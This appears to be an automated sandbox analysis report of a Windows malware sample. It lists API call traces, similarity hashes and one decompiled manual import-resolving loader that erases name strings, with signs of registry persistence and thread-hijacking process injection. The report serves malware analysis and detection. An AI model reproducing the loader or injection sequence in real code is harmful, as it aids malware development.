  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}
APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
